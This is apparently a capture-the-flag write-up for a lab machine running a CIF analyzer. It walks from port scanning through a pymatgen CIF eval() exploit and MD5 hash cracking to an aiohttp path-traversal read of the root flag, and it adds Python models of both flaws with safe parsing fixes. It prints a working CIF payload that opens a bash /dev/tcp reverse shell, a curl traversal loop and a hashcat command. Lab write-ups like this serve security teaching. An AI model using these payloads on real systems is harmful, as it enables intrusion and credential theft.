Enumeration
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Thu, 21 Nov 2024 14:37:39 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| <h1 class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| <a href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
8081/tcp open http SimpleHTTPServer 0.6 (Python 3.8.10)
|_http-server-header: SimpleHTTP/0.6 Python/3.8.10
|_http-title: Directory listing for /
Directory Listing
I think that directory listing on port 8081 was a bug, because when I started the machine again the next day, the directory was gone.
CIF Analyzer
The service on port 5000 is a Flask application (the banner shows Werkzeug 3.0.3 on Python 3.9.5). Default credentials such as admin:admin or admin:password do not work, so a separate user must be registered to access the page.
I tested uploading several file types, but only **.CIF files** are accepted.
Exploit
The payload can therefore only be delivered through a **.CIF file**. It took some time and research with Google to find an appropriate method. The decisive hint came from the following GitHub security advisory for pymatgen, the Python library that parses CIF files:
Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation…
The vulnerability can be exploited as follows, using the proof of concept from the advisory as a reference. Affected versions hand the value of the following CIF field to JonesFaithfulTransformation.from_transformation_str, which evaluated it with Python's eval(), so a system command can be executed from this one line:
_space_group_magn.transform_BNS_Pp_abc
Example from GitHub
'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
Because that eval() runs with builtins disabled, a plain __import__ is not available. The expression therefore starts from an empty tuple, walks ().__class__.__mro__ up to object, lists all of its subclasses, picks BuiltinImporter and uses its load_module to obtain the already imported os module, whose system() then executes the command. In the advisory's example that command only creates a file; the same call can be used to open a reverse shell instead.
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.16/4444 0>&1'");0,0,0'
The following two lines from the proof of concept must also be present at the end of the file; the parser only processes the transformation string when the CIF declares a BNS magnetic space group:
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
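To make the odd shape of that payload concrete, here is an added example. It is my own illustration, not pymatgen's code and not the advisory's PoC. eval_component_unsafe mirrors the pattern of the pre-fix parser: the user-controlled "a,b,c;0,0,0" string is split on ";" and ",", a regex inserts the implicit "*" between coefficients and basis letters, and each piece is passed to eval() with __builtins__ set to None as the only "sandbox". That regex and that sandbox are the reason the public payload spells "__sub" + "classes__" and puts a space before every "("; the block runs the same escape with a harmless os.getpid() in place of touch pwned. parse_safe is an allow-list parser for the same grammar that I wrote for this page (it is not the upstream fix), and the sample CIF is constructed to look like the upload above.

```python
"""Added illustration of the pymatgen CIF bug; not pymatgen's own code.

eval_component_unsafe() mirrors the shape of the pre-fix parser (split the
"a,b,c;0,0,0" string, insert implicit "*", eval() each piece with builtins
disabled).  parse_safe() is an allow-list parser written for this page."""
import os
import re
from fractions import Fraction

# Simplified stand-in for the implicit-multiplication rewrite: "2a" -> "2*a",
# "ab" -> "a*b", "f(" -> "f*(".  Applied to arbitrary text it also turns "bash"
# into "b*ash" and "__subclasses__" into "__sub*classes__", which is why the
# public payload spells "__sub" + "classes__" and puts a space before each "(".
_IMPLICIT_MUL = re.compile(r"(?<=[\dabc])(?=[abc])|(?<=\w)(?=\()")
_BASIS = {"a": (1, 0, 0), "b": (0, 1, 0), "c": (0, 0, 1)}  # names eval() may see


def eval_component_unsafe(expr):
    """The vulnerable pattern: eval() with __builtins__ removed as the only sandbox."""
    return eval(_IMPLICIT_MUL.sub("*", expr), {"__builtins__": None}, dict(_BASIS))


# The public payload with os.getpid() in place of os.system("touch pwned"), so
# it is harmless to run.  No builtins means no __import__, hence the detour:
# start from an empty tuple, walk the MRO to object, list its subclasses, pick
# BuiltinImporter and ask its load_module() for the already imported "os".
ESCAPE = (
    '[d for d in ().__class__.__mro__[1].__getattribute__ '
    '( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () '
    'if d.__name__ == "BuiltinImporter"][0].load_module ("os").getpid ()'
)


def current_pid():
    """Reference value: what the escape above should return if it ran."""
    return os.getpid()


# --- allow-list parser for the same field ---------------------------------
# A basis entry is a sum of terms "a", "-b", "2c", "1/2a"; a shift is a rational.
_AXIS = re.compile(r"[+-]?(?:\d+(?:/\d+)?)?[abc](?:[+-](?:\d+(?:/\d+)?)?[abc])*")
_TERM = re.compile(r"([+-]?)(\d+(?:/\d+)?)?([abc])")


def _parse_axis(expr):
    expr = expr.replace(" ", "")
    if not _AXIS.fullmatch(expr):
        raise ValueError(f"not a basis expression: {expr!r}")
    row = [Fraction(0)] * 3
    for sign, coef, axis in _TERM.findall(expr):
        value = Fraction(coef) if coef else Fraction(1)
        row["abc".index(axis)] += -value if sign == "-" else value
    return row


def parse_safe(transformation):
    """Return ([row_a, row_b, row_c], [shift_x, shift_y, shift_z]) or raise ValueError.

    Nothing here is executed: the input either matches the grammar or is rejected."""
    parts = transformation.split(";")
    if len(parts) != 2:
        raise ValueError("expected 'a,b,c;0,0,0'")
    axes, shifts = parts[0].split(","), parts[1].split(",")
    if len(axes) != 3 or len(shifts) != 3:
        raise ValueError("expected three basis entries and three shifts")
    return [_parse_axis(x) for x in axes], [Fraction(s.strip()) for s in shifts]


def safe_parser_rejects(transformation):
    try:
        parse_safe(transformation)
    except ValueError:
        return True
    return False


# --- pulling the field out of a CIF file ------------------------------------
_TRANSFORM_LINE = re.compile(
    r"^_space_group_magn\.transform_BNS_Pp_abc[ \t]+(?:'(.*)'|(\S+))[ \t]*$", re.M)


def transform_from_cif(cif_text):
    """Return the transform_BNS_Pp_abc value (quotes stripped) or None."""
    m = _TRANSFORM_LINE.search(cif_text)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


# Constructed sample CIF shaped like the write-up's upload (harmless payload).
SAMPLE_CIF = f"""data_pwn
_space_group_magn.transform_BNS_Pp_abc 'a,b,{ESCAPE};0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""

if __name__ == "__main__":
    field = transform_from_cif(SAMPLE_CIF)
    print("safe parser rejects the upload:", safe_parser_rejects(field))
    print("eval() path ran the payload, pid:", eval_component_unsafe(ESCAPE))
```

The allow-list parser is the fix pattern to take away: a transformation string has a tiny grammar, so parse it with a regex and Fraction and reject everything else instead of trying to make eval() safe by removing builtins, which this payload shows is not a sandbox at all.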
Foothold
And here is the reverse shell, caught by a listener on 10.10.14.16:4444, the address used in the payload.
Unfortunately, the shell does not have the permissions needed to read the user flag, so privileges must be escalated.
Priv-Escalation
Continue in the reverse shell. First, upgrade it to a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
In the instance folder in the home directory of the user app there is a file called database.db.
Check which database software is installed on the box:
apt list --installed | grep sql
The file can be opened with sqlite3, perfect!
Show all tables in the database
sqlite3 database.db
.tables
Next, I query the data and output it using standard SQL syntax.
select * from user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|username|cc03e747a6afbbcbf8be7668acfebee5
Here I found the users along with their password hashes. The 32-character hex digests are MD5 (hashcat mode 0), which can easily be cracked with Hashcat against rockyou:
hashcat -m 0 hashes /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
One of the cracked passwords belongs to the user rosa. Accordingly, you can now log in as rosa over SSH and read the user flag.
Root-Flag
For a quick overview, linpeas can be used.
Releases · peass-ng/PEASS-ng
Serve it from the attacker machine with python -m http.server and fetch it on the box.
Linpeas reports that the system may be vulnerable to CVE-2021-3560 (the polkit bug). Note that the PoC linked below targets CVE-2021-3156, the sudo heap overflow, which is a different vulnerability.
GitHub – 0xdevil/CVE-2021-3156: CVE-2021-3156: Sudo heap overflow exploit for Debian 10
Unfortunately, this was not confirmed: the system is not vulnerable to CVE-2021-3560. No vectors for privilege escalation via SUID binaries could be identified either, so I checked which services are listening on the system.
A service is listening on TCP port 8080 that looks like some kind of monitoring application. It is served by the Python aiohttp library, for which there is a path traversal CVE in the static file handler that can be exploited quite easily:
GitHub – z3rObyte/CVE-2024-23334-PoC: A proof of concept of the path traversal vulnerability in the…
A proof of concept of the path traversal vulnerability in the python AioHTTP library <= 3.9.1 …
LFI-aiohttp-CVE-2024-23334-PoC/lfi_aiohttp.sh at main ·…
Bash script to automate Local File Inclusion (LFI) attacks on aiohttp server version 3.9.1. …
Accordingly, the script from the first GitHub repository can be adapted with little effort: the static route on port 8080 serves /assets/, and the script walks up from there with ../ until the root flag is returned.
#!/bin/bash
# Adds one ../ per attempt below the static route until the server answers 200,
# then prints the file. --path-as-is keeps curl from normalising the ../
# segments away before they reach the server.
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt" # without the leading /, so surplus ../ collapse at /
for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done
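The reason the loop has to grow the ../ prefix is worth seeing in code. The following added example is my own model of the flaw class, not aiohttp's code: a static route joins the requested path onto its directory, resolves it and serves the result. resolve_unsafe trusts the resolved path, which is what the affected versions did once follow_symlinks was enabled; resolve_safe additionally requires the resolved path to stay under the static directory. probe_depths repeats the write-up's loop against a constructed layout in a temporary folder, with the target given relative to the filesystem root exactly as root/root.txt is above, so the number of ../ needed is simply the depth of the static directory and any surplus collapses at /.

```python
"""Added model of the static-route traversal class behind CVE-2024-23334.
Not aiohttp's code: resolve_unsafe() trusts the resolved path, as the
affected versions did with follow_symlinks enabled; resolve_safe() keeps the
containment check."""
import tempfile
from pathlib import Path


def resolve_unsafe(root, url_path):
    """Join, resolve, serve.  "../" segments walk out of root unchallenged."""
    return (root / url_path.lstrip("/")).resolve()


def resolve_safe(root, url_path):
    """Same join, but the resolved path must still sit under the resolved root."""
    root = root.resolve()
    target = (root / url_path.lstrip("/")).resolve()
    target.relative_to(root)  # ValueError if "../" or a symlink escaped root
    return target


def probe_depths(resolver, root, target_from_fs_root, max_depth=15):
    """The write-up's loop in miniature: add one "../" per try until the
    resolver lands on an existing file.  Returns (depth, path) or None."""
    for depth in range(1, max_depth + 1):
        try:
            candidate = resolver(root, "../" * depth + target_from_fs_root)
        except ValueError:
            continue
        if candidate.is_file():
            return depth, candidate
    return None


def build_layout(base):
    """Constructed layout: base/www/assets is the static dir; base/secret.txt is outside it."""
    static = base / "www" / "assets"
    static.mkdir(parents=True)
    (static / "styles.css").write_text("body {}\n")
    secret = base / "secret.txt"
    secret.write_text("flag{constructed}\n")
    return static, secret


def demo():
    """Run both resolvers against the constructed layout in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        static, secret = build_layout(Path(tmp))
        static, secret = static.resolve(), secret.resolve()
        # Like "root/root.txt" above: the target relative to "/", so that any
        # surplus "../" simply collapses at the filesystem root.
        target = secret.relative_to(secret.anchor).as_posix()
        unsafe = probe_depths(resolve_unsafe, static, target)
        safe = probe_depths(resolve_safe, static, target)
        return {
            "expected_depth": len(static.parts) - 1,  # "../" needed to reach "/"
            "unsafe_depth": unsafe[0] if unsafe else None,
            "unsafe_content": unsafe[1].read_text() if unsafe else None,
            "safe_depth": safe[0] if safe else None,
            "legit_still_served": resolve_safe(static, "styles.css") == static / "styles.css",
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The check in resolve_safe is Path.relative_to on the resolved paths, which compares path components rather than string prefixes, so a sibling directory such as /srv/assets2 is rejected as well, and because it runs after resolve() it also catches symlinks that point outside the static root.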